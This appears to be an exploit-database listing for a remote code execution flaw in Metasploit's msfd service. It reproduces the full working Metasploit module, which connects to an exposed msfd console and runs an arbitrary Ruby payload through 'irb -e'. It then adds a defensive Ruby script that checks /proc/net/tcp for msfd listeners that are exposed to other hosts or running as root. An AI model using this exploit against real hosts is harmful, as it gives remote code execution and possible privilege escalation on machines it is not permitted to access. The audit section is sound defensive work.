Metasploit Framework – ‘msfd’ Remote Code Execution (Metasploit)

Authors: Metasploit         Risk: High

CVE: NO                     0day: Remote Code Execution

0day-id: 0DAY-176136        Date: 2018-05-03

Background

The Metasploit project is a computer security project that provides information about security vulnerabilities. It assists security engineers with penetration testing and with developing signatures for intrusion detection systems.

The best-known subproject of the Metasploit project is the open source Metasploit Framework, a set of tools for developing and executing “exploit code” against remote hosts. Other important subprojects include the Opcode database, shellcode files, security research, and more.

The Metasploit project is also well known for its anti-forensics and circumvention tools, some of which have been built into the Metasploit Framework.

Exploit

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::Tcp
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Metasploit msfd Remote Code Execution',
      'Description'    => %q{
      Metasploit's msfd-service makes it possible to get a msfconsole-like
      interface over a TCP socket. If this socket is accessible on a remote
      interface, an attacker can execute commands on the victim's machine.
 
      If msfd is running with higher privileges than the current local user,
      this module can also be used for privilege escalation. In that case,
      port forwarding on the compromised host can be used.
 
      Code execution is achieved with the msfconsole command: irb -e 'CODE'.
      },
      'Author'         => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
      'License'        => BSD_LICENSE,
      'Platform'       => "ruby",
      'Arch'           => ARCH_RUBY,
      'Payload'        =>
        {
          'Space'    => 8192,   # Arbitrary limit
          'BadChars' => "\x27\x0a",
          'DisableNops' => true
        },
      'Targets'  =>
        [
          [ 'Automatic', { } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 11 2018',  # Vendor notification
      'DefaultTarget'  => 0))
 
    register_options(
      [
        Opt::RPORT(55554)
      ])
  end
 
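  def check
    connect
    # get_once returns nil when no banner arrives before the timeout
    data = sock.get_once
    disconnect
    # An msfconsole-style banner or prompt contains "msf"
    if data && data.include?("msf")
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Unknown
  end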
 
  def exploit
    connect
    sock.get_once
    sock.put "irb -e '" + payload.encoded + "'\n"
    disconnect
  end
end
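
The module description names two conditions: an msfd socket reachable on a remote interface, and msfd running with higher privileges than the local user. The following audit for both is an added example, not part of the original module or of the Metasploit project. It assumes a Linux host, the IPv4 table /proc/net/tcp on a little-endian CPU, and msfd left on port 55554 (the module's default RPORT); the function names and sample tables are constructed for illustration.

```ruby
# Added example (not part of the module above): flag msfd listeners that are
# reachable from other hosts or that run as root. IPv4 table only.
MSFD_PORT = 55554  # default RPORT of the module; assumption: msfd was not moved
TCP_LISTEN = '0A'  # state code for LISTEN in /proc/net/tcp

# /proc/net/tcp stores IPv4 addresses as hex in host byte order
# (little-endian is assumed here), so the bytes are reversed when decoding.
def decode_ipv4(hex)
  [hex].pack('H*').bytes.reverse.join('.')
end

# Returns one finding per socket listening on MSFD_PORT.
def audit_msfd(proc_net_tcp)
  proc_net_tcp.lines.drop(1).filter_map do |line|
    f = line.split
    next if f.size < 8 || f[3] != TCP_LISTEN
    addr_hex, port_hex = f[1].split(':')
    next unless port_hex.to_i(16) == MSFD_PORT
    addr = decode_ipv4(addr_hex)
    uid = f[7].to_i
    risk = if !addr.start_with?('127.')
             :remote_exposure            # console reachable from other hosts
           elsif uid.zero?
             :local_privilege_escalation # loopback only, but console runs as root
           else
             :loopback_unprivileged
           end
    { address: addr, uid: uid, risk: risk }
  end
end

# Constructed samples in /proc/net/tcp layout, one per hypothetical host.
HEADER = "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
EXPOSED_HOST = HEADER + <<~ROWS
  0: 00000000:D902 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000 0 20001
  1: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   118 0 20002
ROWS
ROOT_LOOPBACK_HOST = HEADER + <<~ROWS
  0: 0100007F:D902 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0 0 20003
  1: 0100007F:D902 0100007F:C350 01 00000000:00000000 00:00000000 00000000     0 0 20004
ROWS

if __FILE__ == $PROGRAM_NAME
  { 'exposed-host' => EXPOSED_HOST, 'root-loopback-host' => ROOT_LOOPBACK_HOST }.each do |name, table|
    audit_msfd(table).each { |finding| puts "#{name}: #{finding}" }
  end
end
```

On a live host, pass `File.read('/proc/net/tcp')` to `audit_msfd` in place of the constructed tables.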

 
